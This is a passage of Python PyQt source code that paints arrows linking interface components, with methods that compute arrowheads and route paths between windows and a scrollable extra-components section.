leftCornerY = min(srcPos.y(), dstPos.y())
width = abs(srcPos.x() - dstPos.x())
height = abs(srcPos.y() - dstPos.y())
return QRectF(leftCornerX, leftCornerY, width, height)
def paint(self, painter: QPainter, option, widget):
"""
Paints the contents of the visibilitybehavior. Override the parent paint function.
Only renders the visibility behavior if the configuration variable, showBehaviors, is true.
:param painter: Use a Qpainter object.
:type painter: QPainter
:param option: It provides style options for the item.
:type option: QStyleOptionGraphicsItem
:param widget: QWidget
:type widget: It points to the widget that is being painted on; or make it = None.
:return: None
:rtype: NoneType
"""
# Only draw visibility behaviors if "Show Visibility Behaviors" action is checked in the View drop down.
if sm.StateMachine.instance.configVars.showBehaviors:
pen = QPen()
if self.isSelected():
arrowColor = VBGraphics.SEL_ARROW_COL
pen.setStyle(Qt.DashDotLine)
else:
arrowColor = VBGraphics.ARROW_COL
if self._compIsHidden:
arrowColor = VBGraphics.HIDDEN_ARROW_COL
pen.setStyle(Qt.SolidLine)
pen.setColor(arrowColor)
pen.setJoinStyle(Qt.RoundJoin)
pen.setCapStyle(Qt.RoundCap)
pen.setWidth(3)
painter.setPen(pen)
# Path and Arrowhead
path, arrival, direction, pathBoundingRect = self.buildPath()
arrowHead, arrowHeadBoundingRect = self.buildArrowHead(arrival, direction)
brTLx = min(pathBoundingRect.topLeft().x(), arrowHeadBoundingRect.topLeft().x())
brTLy = min(pathBoundingRect.topLeft().y(), arrowHeadBoundingRect.topLeft().y())
brBLy = max(pathBoundingRect.bottomLeft().y(), arrowHeadBoundingRect.bottomLeft().y())
brTRx = max(pathBoundingRect.topRight().x(), arrowHeadBoundingRect.topRight().x())
brHeight = brBLy - brTLy
brWidth = brTRx - brTLx
margin = 100
self._boundingRect = QRectF(brTLx - margin, brTLy - margin, brWidth + margin * 2, brHeight + margin * 2)
# Either of these lines will fix the drawing issue
self.prepareGeometryChange()
# self.scene().setSceneRect(self.scene().itemsBoundingRect())
# Draw path
painter.drawPath(path)
# Draw Arrowhead
pen.setStyle(Qt.SolidLine)
painter.setPen(pen)
painter.drawPath(arrowHead)
painter.fillPath(arrowHead, QBrush(arrowColor))
def buildArrowHead(self, arrival, direction):
"""
Draws the path for the arrowhead.
:param arrival: x,y coordinate tuple of arrival point
:type arrival: tuple
:param direction: Direction of arrival - from top:0, left:1, right:2, bottom:3
:type direction: int
"""
x = arrival[0]
y = arrival[1]
# draw the arrow head
aSize = 4
if direction == 0: # Top
arrowHead = QPainterPath()
arrowHead.moveTo(x, y)
arrowHead.lineTo(x - aSize, y - aSize * 2)
arrowHead.lineTo(x + aSize, y - aSize * 2)
arrowHead.lineTo(x, y)
elif direction == 1: # Left
arrowHead = QPainterPath()
arrowHead.moveTo(x, y)
arrowHead.lineTo(x - aSize * 2, y - aSize)
arrowHead.lineTo(x - aSize * 2, y + aSize)
arrowHead.lineTo(x, y)
elif direction == 2: # Right
arrowHead = QPainterPath()
arrowHead.moveTo(x, y)
arrowHead.lineTo(x + aSize * 2, y - aSize)
arrowHead.lineTo(x + aSize * 2, y + aSize)
arrowHead.lineTo(x, y)
else: # Bottom
arrowHead = QPainterPath()
arrowHead.moveTo(x, y)
arrowHead.lineTo(x - aSize, y + aSize * 2)
arrowHead.lineTo(x + aSize, y + aSize * 2)
arrowHead.lineTo(x, y)
boundingRect = arrowHead.boundingRect()
return arrowHead, boundingRect
def buildPath(self) -> tuple:
"""
Makes a path from the source component to the destination component.
Follows the following general pattern, both for src and dst behavior, which are then connected by a line:
- If not in extra components section:
- If in same window, just follow rectangular path from one component to other.
- If center is in left 6th of window route arrow directly out left.
- Otherwise, if center is in top half of window, route out top of window, then parallel to window
until on left side of scene.
- Otherwise, out bottom of window, then parallel to window until on left of scene.
- If in extra components section:
- If hidden on the left, then the arrow is routed past a certain point, after which it turns to go
into EC section, then turns again going until the top-level window's end, seeming like it goes under.
- If hidden on right, same situation, mirrored.
- If in the middle, arrow follows parallel to left side of component, with a buffer
Note: When using points, the first index is what point on the component: top:0, left:1, right:2, bottom:3
and the second index is the coordinate: x:0, y:1.
:return: the path, arrival coordinates, direction of arrival, and path boundingrect
:rtype: (QPainterPath, tuple(int, int), int, rect)
"""
# --- INITIALIZATION --- #
# Instantiate path
path = QPainterPath()
# Get the components
srcComp = self._srcComp
dstComp = self._dstComp
# Get the components' containing windows, their positional attributes as [x, y, width, height] list,
# and the EC Section width
srcWin = srcComp.getWindowGraphics()
dstWin = dstComp.getWindowGraphics()
srcWinRect = [srcWin.scenePos().x(), srcWin.scenePos().y(), srcWin.width(), srcWin.height()]
dstWinRect = [dstWin.scenePos().x(), dstWin.scenePos().y(), dstWin.width(), dstWin.height()]
if srcWin.getScrollableItem():
srcECSWidth = srcWin.getScrollableItem().rect().width()
else:
srcECSWidth = 0
if dstWin.getScrollableItem():
dstECSWidth = dstWin.getScrollableItem().rect().width()
else:
dstECSWidth = 0
# Find points to stem from/arrive to as [top, left, right, bottom] list of x,y coordinate tuples
srcPoints = [(srcComp.scenePos().x() + srcComp.width() / 2, srcComp.scenePos().y()),
(srcComp.scenePos().x(), srcComp.scenePos().y() + srcComp.height() / 2),
(srcComp.scenePos().x() + srcComp.width(), srcComp.scenePos().y() + srcComp.height() / 2),
(srcComp.scenePos().x() + srcComp.width() / 2, srcComp.scenePos().y() + srcComp.height())]
dstPoints = [(dstComp.scenePos().x() + dstComp.width() / 2, dstComp.scenePos().y()),
(dstComp.scenePos().x(), dstComp.scenePos().y() + dstComp.height() / 2),
(dstComp.scenePos().x() + dstComp.width(), dstComp.scenePos().y() + dstComp.height() / 2),
(dstComp.scenePos().x() + dstComp.width() / 2, dstComp.scenePos().y() + dstComp.height())]
# Get both of their center points
# NOTE: If src/dstPoints is changed, this needs to be changed
srcCompCenter = (srcPoints[0][0], srcPoints[1][1])
dstCompCenter = (dstPoints[0][0], dstPoints[1][1])
# ---------------------- #
# Catch if in EC Section, along with the Extra Comp itself
srcInECSection, srcEC = srcComp.isInECSection()
dstInECSection, dstEC = dstComp.isInECSection()
# --- Calculate Distances --- #
numWin = round(abs(srcWinRect[1] - dstWinRect[1]) / 700 - 1) # Number of windows between the two windows
srcDistProp = (srcCompCenter[0] - srcWinRect[0]) / srcWinRect[2] # distance from left of window as prop
dstDistProp = (dstCompCenter[0] - dstWinRect[0]) / dstWinRect[2]
vDistSrc = 10 + max(0, srcDistProp * 20) # Distance from top or bottom edges to make a turn to go to the left
vDistDst = 10 + max(0, dstDistProp * 20) # Distance from top or bottom edges to make a turn to go to the left
echDist = 20 # The x distance to pass before turning to go into EC Section
ecvDist = 50 # The height the VB goes to before going to hidden component
# sign = lambda a: (a > 0) - (a < 0) # gets the sign of a number
srcPadding = 20
dstPadding = 20
if srcInECSection: # The x distance from the side of an extra component to turn towards/away from it
prop = (srcPoints[2][1] - srcEC.scenePos().y()) / srcEC.height()
srcPadding = 10 + 20 * prop # min 10, max 30
vDistSrc *= (1 + prop / 4)
vDistSrc = min(vDistSrc, 49)
if dstInECSection: # The x distance from the side of an extra component to turn towards/away from it
prop = (dstPoints[2][1] - dstEC.scenePos().y()) / dstEC.height()
dstPadding = 10 + 20 * prop # min 10, max 30
vDistDst *= (1 + prop / 4)
vDistDst = min(vDistDst, 49)
# Distance from left of window (its x pos) to make a right-angle turn
if dstWinRect[1] != srcWinRect[1]: # Dst is below src
hDist = min(numWin * 15 + (srcDistProp + dstDistProp) * 10 + VBGraphics.MIN_LEFT_DIST,
VBGraphics.MAX_LEFT_DIST)
else: # Same window
hDist = VBGraphics.MIN_LEFT_DIST # Still assigned, but used in a different way
# --------------------------- #
# --- IN SAME WINDOW --- #
if srcWin is dstWin:
if not (srcInECSection or dstInECSection): # same window
# Destination is on left
if dstCompCenter[0] + hDist <= srcPoints[1][0] and dstPoints[2][0] < srcPoints[1][0] - hDist:
xDist = srcPoints[1][0] - dstPoints[2][0]
path.moveTo(srcPoints[1][0], srcPoints[1][1])
path.lineTo(srcPoints[1][0] - xDist / 2, srcPoints[1][1])
path.lineTo(srcPoints[1][0] - xDist / 2, dstPoints[2][1])
path.lineTo(dstPoints[2][0], dstPoints[2][1])
arrival = (dstPoints[2][0], dstPoints[2][1])
direction = 2
# Destination is generally to the left but closer than last condition
elif dstCompCenter[0] + hDist <= srcCompCenter[0]:
path.moveTo(srcPoints[1][0], srcPoints[1][1])
if dstCompCenter[1] < srcCompCenter[1]: # Dst above Src
if dstPoints[2][0] >= srcPoints[1][0] - hDist:
path.lineTo(dstPoints[3][0], srcPoints[1][1])
path.lineTo(dstPoints[3][0], dstPoints[3][1])
else:
path.lineTo(srcPoints[1][0] - hDist / 2, srcPoints[1][1])
path.lineTo(srcPoints[1][0] - hDist / 2, dstPoints[3][1] + hDist)
path.lineTo(dstPoints[3][0], dstPoints[3][1] + hDist)
path.lineTo(dstPoints[3][0], dstPoints[3][1])
arrival = (dstPoints[3][0], dstPoints[3][1])
direction = 3
else:
if dstPoints[2][0] >= srcPoints[1][0] - hDist:
path.lineTo(dstPoints[0][0], srcPoints[1][1])
path.lineTo(dstPoints[0][0], dstPoints[0][1])
else:
path.lineTo(srcPoints[1][0] - hDist / 2, srcPoints[1][1])
path.lineTo(srcPoints[1][0] - hDist / 2, dstPoints[0][1] - hDist)
path.lineTo(dstPoints[0][0], dstPoints[0][1] - hDist)
path.lineTo(dstPoints[0][0], dstPoints[0][1])
arrival = (dstPoints[0][0], dstPoints[0][1])
direction = 0
# Destination is pretty much vertically aligned
elif dstCompCenter[0] + hDist > srcCompCenter[0] > dstCompCenter[0] - hDist:
if dstCompCenter[1] < srcCompCenter[1]: # Dst above Src
yDist = srcPoints[0][1] - dstPoints[3][1]
path.moveTo(srcPoints[0][0], srcPoints[0][1])
path.lineTo(srcPoints[0][0], srcPoints[0][1] - yDist / 2)
path.lineTo(dstPoints[3][0], srcPoints[0][1] - yDist / 2)
path.lineTo(dstPoints[3][0], dstPoints[3][1])
arrival = (dstPoints[3][0], dstPoints[3][1])
direction = 3
else:
yDist = dstPoints[0][1] - srcPoints[3][1]
path.moveTo(srcPoints[3][0], srcPoints[3][1])
path.lineTo(srcPoints[3][0], srcPoints[3][1] + yDist / 2)
path.lineTo(dstPoints[0][0], srcPoints[3][1] + yDist / 2)
path.lineTo(dstPoints[0][0], dstPoints[0][1])
arrival = (dstPoints[0][0], dstPoints[0][1])
direction = 0
# Destination is generally to the right but closer than next condition
elif srcCompCenter[0] <= dstCompCenter[0] - hDist <= srcPoints[2][0] or \
dstPoints[1][0] < srcPoints[2][0] + hDist:
path.moveTo(srcPoints[2][0], srcPoints[2][1])
if dstCompCenter[1] < srcCompCenter[1]: # Dst above Src
if dstPoints[1][0] < srcPoints[2][0] + hDist:
path.lineTo(dstPoints[3][0], srcPoints[2][1])
path.lineTo(dstPoints[3][0], dstPoints[3][1])
else:
path.lineTo(srcPoints[2][0] + hDist / 2, srcPoints[2][1])
path.lineTo(srcPoints[2][0] + hDist / 2, dstPoints[3][1] + hDist)
path.lineTo(dstPoints[3][0], dstPoints[3][1] + hDist)
path.lineTo(dstPoints[3][0], dstPoints[3][1])
arrival = (dstPoints[3][0], dstPoints[3][1])
direction = 3
else:
if dstPoints[1][0] < srcPoints[2][0] + hDist:
path.lineTo(dstPoints[0][0], srcPoints[2][1])
path.lineTo(dstPoints[0][0], dstPoints[0][1])
else:
path.lineTo(srcPoints[2][0] + hDist / 2, srcPoints[2][1])
path.lineTo(srcPoints[2][0] + hDist / 2, dstPoints[0][1] - hDist)
path.lineTo(dstPoints[0][0], dstPoints[0][1] - hDist)
path.lineTo(dstPoints[0][0], dstPoints[0][1])
arrival = (dstPoints[0][0], dstPoints[0][1])
direction = 0
# Destination is on right
else:
xDist = dstPoints[1][0] - srcPoints[2][0]
path.moveTo(srcPoints[2][0], srcPoints[2][1])
path.lineTo(srcPoints[2][0] + xDist / 2, srcPoints[2][1])
path.lineTo(srcPoints[2][0] + xDist / 2, dstPoints[1][1])
path.lineTo(dstPoints[1][0], dstPoints[1][1])
arrival = (dstPoints[1][0], dstPoints[1][1])
direction = 1
elif srcInECSection and not dstInECSection:
vDist = max(vDistDst, vDistSrc)
ecEnterDist = echDist # The x distance to pass before turning to go into EC Section
ecHiddenHeight = ecvDist # The height the VB goes to before going to hidden component
leftPausePoint = srcWinRect[0] + srcWinRect[2] + ecEnterDist + 30 - srcPadding # 30 is max pad
compHiddenOnLeft = srcPoints[1][0] - srcPadding < leftPausePoint
compHiddenOnRight = srcPoints[1][0] - srcPadding > srcWinRect[0] + srcWinRect[2] + \
srcECSWidth - ecEnterDist
self._compIsHidden = compHiddenOnLeft or compHiddenOnRight
if compHiddenOnLeft:
if srcPoints[2][0] + srcPadding >= srcWinRect[0] + srcWinRect[2]:
# For smoother animation. Not hidden yet
bottom = srcPoints[3]
right = srcPoints[2]
left = srcPoints[1]
if left[0] > leftPausePoint:
path.moveTo(left[0], left[1])
path.lineTo(leftPausePoint, left[1])
path.lineTo(leftPausePoint, srcWinRect[1] + srcWinRect[3] + vDist)
elif right[0] > leftPausePoint:
path.moveTo(leftPausePoint, bottom[1])
path.lineTo(leftPausePoint, srcWinRect[1] + srcWinRect[3] + vDist)
elif right[0] + srcPadding > leftPausePoint:
path.moveTo(right[0], right[1])
path.lineTo(leftPausePoint, right[1])
path.lineTo(leftPausePoint, srcWinRect[1] + srcWinRect[3] + vDist)
elif right[0] + srcPadding > srcWinRect[0] + srcWinRect[2] + ecEnterDist:
path.moveTo(right[0], right[1])
path.lineTo(right[0] + srcPadding, right[1])
path.lineTo(right[0] + srcPadding, srcWinRect[1] + srcWinRect[3] + vDist)
elif right[0] > srcWinRect[0] + srcWinRect[2] + ecEnterDist:
path.moveTo(right[0], right[1])
path.lineTo(right[0] + srcPadding, right[1])
path.lineTo(right[0] + srcPadding, srcWinRect[1] + srcWinRect[3] - ecHiddenHeight)
path.lineTo(srcWinRect[0] + srcWinRect[2] + ecEnterDist,
srcWinRect[1] + srcWinRect[3] - ecHiddenHeight)
path.lineTo(srcWinRect[0] + srcWinRect[2] + ecEnterDist,
srcWinRect[1] + srcWinRect[3] + vDist)
else:
path.moveTo(srcWinRect[0] + srcWinRect[2], right[1])
path.lineTo(right[0] + srcPadding, right[1])
path.lineTo(right[0] + srcPadding, srcWinRect[1] + srcWinRect[3] - ecHiddenHeight)
path.lineTo(srcWinRect[0] + srcWinRect[2] + ecEnterDist,
srcWinRect[1] + srcWinRect[3] - ecHiddenHeight)
path.lineTo(srcWinRect[0] + srcWinRect[2] + ecEnterDist,
srcWinRect[1] + srcWinRect[3] + vDist)
else:
path.moveTo(srcWinRect[0] + srcWinRect[2],
srcWinRect[1] + srcWinRect[3] - ecHiddenHeight)
path.lineTo(srcWinRect[0] + srcWinRect[2] + ecEnterDist,
srcWinRect[1] + srcWinRect[3] - ecHiddenHeight)
path.lineTo(srcWinRect[0] + srcWinRect[2] + ecEnterDist,
srcWinRect[1] + srcWinRect[3] + vDist)
elif compHiddenOnRight:
if srcPoints[1][0] < srcWinRect[0] + srcWinRect[2] + srcECSWidth: # Not hidden yet but close
left = srcPoints[1]
path.moveTo(left[0], left[1])
path.lineTo(left[0] - srcPadding, left[1])
path.lineTo(left[0] - srcPadding, srcWinRect[1] + srcWinRect[3] - ecHiddenHeight)
elif srcPoints[1][0] - srcPadding < srcWinRect[0] + srcWinRect[2] + srcECSWidth:
left = srcPoints[1]
path.moveTo(srcWinRect[0] + srcWinRect[2] + srcECSWidth, left[1])
path.lineTo(left[0] - srcPadding, left[1])
path.lineTo(left[0] - srcPadding, srcWinRect[1] + srcWinRect[3] - ecHiddenHeight)
else:
path.moveTo(srcWinRect[0] + srcWinRect[2] + srcECSWidth,
srcWinRect[1] + srcWinRect[3] - ecHiddenHeight)
path.lineTo(srcWinRect[0] + srcWinRect[2] + srcECSWidth - ecEnterDist,
srcWinRect[1] + srcWinRect[3] - ecHiddenHeight)
path.lineTo(srcWinRect[0] + srcWinRect[2] + srcECSWidth - ecEnterDist,
srcWinRect[1] + srcWinRect[3] + vDist)
else:
left = srcPoints[1]
path.moveTo(left[0], left[1])
path.lineTo(left[0] - srcPadding, left[1])
path.lineTo(left[0] - srcPadding, srcWinRect[1] + srcWinRect[3] + vDist)
path.lineTo(dstPoints[3][0], srcWinRect[1] + srcWinRect[3] + vDist)
path.lineTo(dstPoints[3][0], dstPoints[3][1])
arrival, direction = (dstPoints[3][0], dstPoints[3][1]), 3
elif dstInECSection and not srcInECSection:
vDist = max(vDistDst, vDistSrc)
path.moveTo(srcPoints[3][0], srcPoints[3][1])
path.lineTo(srcPoints[3][0], srcWinRect[1] + srcWinRect[3] + vDist)
ecEnterDist = echDist # The x distance to pass before turning to go into EC Section
ecHiddenHeight = ecvDist # The height the VB goes to before going to hidden component
leftPausePoint = dstWinRect[0] + dstWinRect[2] + ecEnterDist + 30 - dstPadding # 30 is max pad
compHiddenOnLeft = dstPoints[1][0] - dstPadding < leftPausePoint
compHiddenOnRight = dstPoints[1][0] - dstPadding > dstWinRect[0] + dstWinRect[2] + \
dstECSWidth - ecEnterDist
if compHiddenOnLeft:
if dstPoints[2][0] + dstPadding > dstWinRect[0] + dstWinRect[2]:
# For smoother animation. Not hidden yet
bottom = dstPoints[3]
right = dstPoints[2]
left = dstPoints[1]
if left[0] > leftPausePoint:
path.lineTo(leftPausePoint, dstWinRect[1] + dstWinRect[3] + vDist)
path.lineTo(leftPausePoint, left[1])
path.lineTo(left[0], left[1])
arrival = (left[0], left[1])
direction = 1
elif right[0] > leftPausePoint:
path.lineTo(leftPausePoint, dstWinRect[1] + dstWinRect[3] + vDist)
path.lineTo(leftPausePoint, bottom[1])
arrival = (leftPausePoint, bottom[1])
direction = 3
elif right[0] + dstPadding > leftPausePoint:
path.lineTo(leftPausePoint, dstWinRect[1] + dstWinRect[3] + vDist)
path.lineTo(leftPausePoint, right[1])
path.lineTo(right[0], right[1])
arrival = (right[0], right[1])
direction = 2
elif right[0] + dstPadding > dstWinRect[0] + dstWinRect[2] + ecEnterDist:
path.lineTo(right[0] + dstPadding, dstWinRect[1] + dstWinRect[3] + vDist)
path.lineTo(right[0] + dstPadding, right[1])
path.lineTo(right[0], right[1])
arrival = (right[0], right[1])
direction = 2
elif right[0] > dstWinRect[0] + dstWinRect[2] + ecEnterDist:
path.lineTo(dstWinRect[0] + dstWinRect[2] + ecEnterDist,
dstWinRect[1] + dstWinRect[3] + vDist)
path.lineTo(dstWinRect[0] + dstWinRect[2] + ecEnterDist,
dstWinRect[1] + dstWinRect[3] - ecHiddenHeight)
path.lineTo(right[0] + dstPadding, dstWinRect[1] + dstWinRect[3] - ecHiddenHeight)
path.lineTo(right[0] + dstPadding, right[1])
path.lineTo(right[0], right[1])
arrival = (right[0], right[1])
direction = 2
else:
path.lineTo(dstWinRect[0] + dstWinRect[2] + ecEnterDist,
dstWinRect[1] + dstWinRect[3] + vDist)
path.lineTo(dstWinRect[0] + dstWinRect[2] + ecEnterDist,
dstWinRect[1] + dstWinRect[3] - ecHiddenHeight)
path.lineTo(right[0] + dstPadding, dstWinRect[1] + dstWinRect[3] - ecHiddenHeight)
path.lineTo(right[0] + dstPadding, right[1])
path.lineTo(dstWinRect[0] + dstWinRect[2], right[1])
arrival = (dstWinRect[0] + dstWinRect[2], right[1])
direction = 2
else:
path.lineTo(dstWinRect[0] + dstWinRect[2] + ecEnterDist,
dstWinRect[1] + dstWinRect[3] + vDist)
path.lineTo(dstWinRect[0] + dstWinRect[2] + ecEnterDist,
dstWinRect[1] + dstWinRect[3] - ecHiddenHeight)
path.lineTo(dstWinRect[0] + dstWinRect[2],
dstWinRect[1] + dstWinRect[3] - ecHiddenHeight)
arrival = (dstWinRect[0] + dstWinRect[2], dstWinRect[1] + dstWinRect[3] - ecHiddenHeight)
direction = 2
elif compHiddenOnRight:
path.lineTo(dstWinRect[0] + dstWinRect[2] + dstECSWidth - ecEnterDist,
dstWinRect[1] + dstWinRect[3] + vDist)
path.lineTo(dstWinRect[0] + dstWinRect[2] + dstECSWidth - ecEnterDist,
dstWinRect[1] + dstWinRect[3] - ecHiddenHeight)
if dstPoints[1][0] < dstWinRect[0] + dstWinRect[2] + dstECSWidth: # Not hidden yet but close
left = dstPoints[1]
path.lineTo(left[0] - dstPadding, dstWinRect[1] + dstWinRect[3] - ecHiddenHeight)
path.lineTo(left[0] - dstPadding, left[1])
path.lineTo(left[0], left[1])
arrival = (left[0], left[1])
direction = 1
elif dstPoints[1][0] - dstPadding < dstWinRect[0] + dstWinRect[2] + dstECSWidth:
left = dstPoints[1]
path.lineTo(left[0] - dstPadding, dstWinRect[1] + dstWinRect[3] - ecHiddenHeight)
path.lineTo(left[0] - dstPadding, left[1])
path.lineTo(dstWinRect[0] + dstWinRect[2] + dstECSWidth, left[1])
arrival = (dstWinRect[0] + dstWinRect[2] + dstECSWidth, left[1])
direction = 1
else:
path.lineTo(dstWinRect[0] + dstWinRect[2] + dstECSWidth,
dstWinRect[1] + dstWinRect[3] - ecHiddenHeight)
arrival = (dstWinRect[0] + dstWinRect[2] + dstECSWidth,
dstWinRect[1] + dstWinRect[3] - ecHiddenHeight)
direction = 1
else:
left = dstPoints[1]
path.lineTo(left[0] - dstPadding, dstWinRect[1] + dstWinRect[3] + vDist)
path.lineTo(left[0] - dstPadding, left[1])
path.lineTo(left[0], left[1])
arrival = (left[0], left[1])
direction = 1
else: # both in EC Section
vDist = max(vDistDst, vDistSrc)
ecEnterDist = echDist # The x distance to pass before turning to go into EC Section
ecHiddenHeight = ecvDist # The height the VB goes to before going to hidden component
leftPausePoint = srcWinRect[0] + srcWinRect[2] + ecEnterDist + 30 - srcPadding # 30 is max pad
compHiddenOnLeft = srcPoints[1][0] - srcPadding < leftPausePoint
compHiddenOnRight = srcPoints[1][0] - srcPadding > srcWinRect[0] + srcWinRect[2] + \
srcECSWidth - ecEnterDist
if compHiddenOnLeft:
if srcPoints[2][0] + srcPadding > srcWinRect[0] + srcWinRect[2]:
# For smoother animation. Not hidden yet
bottom = srcPoints[3]
right = srcPoints[2]
left = srcPoints[1]
if left[0] > leftPausePoint:
path.moveTo(left[0], left[1])
path.lineTo(leftPausePoint, left[1])
path.lineTo(leftPausePoint, srcWinRect[1] + srcWinRect[3] + vDist)
elif right[0] > leftPausePoint:
path.moveTo(leftPausePoint, bottom[1])
path.lineTo(leftPausePoint, srcWinRect[1] + srcWinRect[3] + vDist)
elif right[0] + srcPadding > leftPausePoint:
path.moveTo(right[0], right[1])
path.lineTo(leftPausePoint, right[1])
path.lineTo(leftPausePoint, srcWinRect[1] + srcWinRect[3] + vDist)
elif right[0] + srcPadding > srcWinRect[0] + srcWinRect[2] + ecEnterDist:
path.moveTo(right[0], right[1])
path.lineTo(right[0] + srcPadding, right[1])
path.lineTo(right[0] + srcPadding, srcWinRect[1] + srcWinRect[3] + vDist)
elif right[0] > srcWinRect[0] + srcWinRect[2] + ecEnterDist:
path.moveTo(right[0], right[1])
path.lineTo(right[0] + srcPadding, right[1])
path.lineTo(right[0] + srcPadding, srcWinRect[1] + srcWinRect[3] - ecHiddenHeight)
path.lineTo(srcWinRect[0] + srcWinRect[2] + ecEnterDist,
srcWinRect[1] + srcWinRect[3] - ecHiddenHeight)
path.lineTo(srcWinRect[0] + srcWinRect[2] + ecEnterDist,
srcWinRect[1] + srcWinRect[3] + vDist)
else:
path.moveTo(srcWinRect[0] + srcWinRect[2], right[1])
path.lineTo(right[0] + srcPadding, right[1])
path.lineTo(right[0] + srcPadding, srcWinRect[1] + srcWinRect[3] - ecHiddenHeight)
path.lineTo(srcWinRect[0] + srcWinRect[2] + ecEnterDist,
srcWinRect[1] + srcWinRect[3] - ecHiddenHeight)
path.lineTo(srcWinRect[0] + srcWinRect[2] + ecEnterDist,
srcWinRect[1] + srcWinRect[3] + vDist)
else:
path.moveTo(srcWinRect[0] + srcWinRect[2],
srcWinRect[1] + srcWinRect[3] - ecHiddenHeight)
path.lineTo(srcWinRect[0] + srcWinRect[2] + ecEnterDist,
srcWinRect[1] + srcWinRect[3] - ecHiddenHeight)
path.lineTo(srcWinRect[0] + srcWinRect[2] + ecEnterDist,
srcWinRect[1] + srcWinRect[3] + vDist)
elif compHiddenOnRight:
if srcPoints[1][0] < srcWinRect[0] + srcWinRect[2] + srcECSWidth: # Not hidden yet but close
left = srcPoints[1]
path.moveTo(left[0], left[1])
path.lineTo(left[0] - srcPadding, left[1])
path.lineTo(left[0] - srcPadding, srcWinRect[1] + srcWinRect[3] - ecHiddenHeight)
elif srcPoints[1][0] - srcPadding < srcWinRect[0] + srcWinRect[2] + srcECSWidth:
left = srcPoints[1]
path.moveTo(srcWinRect[0] + srcWinRect[2] + srcECSWidth, left[1])
path.lineTo(left[0] - srcPadding, left[1])
path.lineTo(left[0] - srcPadding, srcWinRect[1] + srcWinRect[3] - ecHiddenHeight)
else:
path.moveTo(srcWinRect[0] + srcWinRect[2] + srcECSWidth,
srcWinRect[1] + srcWinRect[3] - ecHiddenHeight)
path.lineTo(srcWinRect[0] + srcWinRect[2] + srcECSWidth - ecEnterDist,
srcWinRect[1] + srcWinRect[3] - ecHiddenHeight)
path.lineTo(srcWinRect[0] + srcWinRect[2] + srcECSWidth - ecEnterDist,
srcWinRect[1] + srcWinRect[3] + vDist)
else:
left = srcPoints[1]
path.moveTo(left[0], left[1])
path.lineTo(left[0] - srcPadding, left[1])
path.lineTo(left[0] - srcPadding, srcWinRect[1] + srcWinRect[3] + vDist)
# Destination
ecEnterDist = echDist # The x distance to pass before turning to go into EC Section
ecHiddenHeight = ecvDist # The height the VB goes to before going to hidden component
leftPausePoint = dstWinRect[0] + dstWinRect[2] + ecEnterDist + 30 - dstPadding # 30 is max pad
compHiddenOnLeft = dstPoints[1][0] - dstPadding < leftPausePoint
compHiddenOnRight = dstPoints[1][0] - dstPadding > dstWinRect[0] + dstWinRect[2] + \
dstECSWidth - ecEnterDist
if compHiddenOnLeft:
if dstPoints[2][0] + dstPadding > dstWinRect[0] + dstWinRect[2]:
# For smoother animation. Not hidden yet
bottom = dstPoints[3]
right = dstPoints[2]
left = dstPoints[1]
if left[0] > leftPausePoint:
path.lineTo(leftPausePoint, dstWinRect[1] + dstWinRect[3] + vDist)
path.lineTo(leftPausePoint, left[1])
path.lineTo(left[0], left[1])
arrival = (left[0], left[1])
direction = 1
elif right[0] > leftPausePoint:
path.lineTo(leftPausePoint, dstWinRect[1] + dstWinRect[3] + vDist)
path.lineTo(leftPausePoint, bottom[1])
arrival = (leftPausePoint, bottom[1])
direction = 3
elif right[0] + dstPadding > leftPausePoint:
path.lineTo(leftPausePoint, dstWinRect[1] + dstWinRect[3] + vDist)
path.lineTo(leftPausePoint, right[1])
path.lineTo(right[0], right[1])
arrival = (right[0], right[1])
direction = 2
elif right[0] + dstPadding > dstWinRect[0] + dstWinRect[2] + ecEnterDist:
path.lineTo(right[0] + dstPadding, dstWinRect[1] + dstWinRect[3] + vDist)
path.lineTo(right[0] + dstPadding, right[1])
path.lineTo(right[0], right[1])
arrival = (right[0], right[1])
direction = 2
elif right[0] > dstWinRect[0] + dstWinRect[2] + ecEnterDist:
path.lineTo(dstWinRect[0] + dstWinRect[2] + ecEnterDist,
dstWinRect[1] + dstWinRect[3] + vDist)
path.lineTo(dstWinRect[0] + dstWinRect[2] + ecEnterDist,
dstWinRect[1] + dstWinRect[3] - ecHiddenHeight)
path.lineTo(right[0] + dstPadding, dstWinRect[1] + dstWinRect[3] - ecHiddenHeight)
path.lineTo(right[0] + dstPadding, right[1])
path.lineTo(right[0], right[1])
arrival = (right[0], right[1])
direction = 2
else:
path.lineTo(dstWinRect[0] + dstWinRect[2] + ecEnterDist,
dstWinRect[1] + dstWinRect[3] + vDist)
path.lineTo(dstWinRect[0] + dstWinRect[2] + ecEnterDist,
dstWinRect[1] + dstWinRect[3] - ecHiddenHeight)
path.lineTo(right[0] + dstPadding, dstWinRect[1] + dstWinRect[3] - ecHiddenHeight)
path.lineTo(right[0] + dstPadding, right[1])
path.lineTo(dstWinRect[0] + dstWinRect[2], right[1])
arrival = (dstWinRect[0] + dstWinRect[2], right[1])
direction = 2
else:
path.lineTo(dstWinRect[0] + dstWinRect[2] + ecEnterDist,
dstWinRect[1] + dstWinRect[3] + vDist)
path.lineTo(dstWinRect[0] + dstWinRect[2] + ecEnterDist,
dstWinRect[1] + dstWinRect[3] - ecHiddenHeight)
path.lineTo(dstWinRect[0] + dstWinRect[2],
dstWinRect[1] + dstWinRect[3] - ecHiddenHeight)
arrival = (dstWinRect[0] + dstWinRect[2], dstWinRect[1] + dstWinRect[3] - ecHiddenHeight)
direction = 2
elif compHiddenOnRight:
path.lineTo(dstWinRect[0] + dstWinRect[2] + dstECSWidth - ecEnterDist,
dstWinRect[1] + dstWinRect[3] + vDist)
path.lineTo(dstWinRect[0] + dstWinRect[2] + dstECSWidth - ecEnterDist,
dstWinRect[1] + dstWinRect[3] - ecHiddenHeight)
if dstPoints[1][0] < dstWinRect[0] + dstWinRect[2] + dstECSWidth: # Not hidden yet but close
left = dstPoints[1]
path.lineTo(left[0] - dstPadding, dstWinRect[1] + dstWinRect[3] - ecHiddenHeight)
path.lineTo(left[0] - dstPadding, left[1])
path.lineTo(left[0], left[1])
arrival = (left[0], left[1])
direction = 1
elif dstPoints[1][0] - dstPadding < dstWinRect[0] + dstWinRect[2] + dstECSWidth:
left = dstPoints[1]
path.lineTo(left[0] - dstPadding, dstWinRect[1] + dstWinRect[3] - ecHiddenHeight)
path.lineTo(left[0] - dstPadding, left[1])
path.lineTo(dstWinRect[0] + dstWinRect[2] + dstECSWidth, left[1])
arrival = (dstWinRect[0] + dstWinRect[2] + dstECSWidth, left[1])
direction = 1
else:
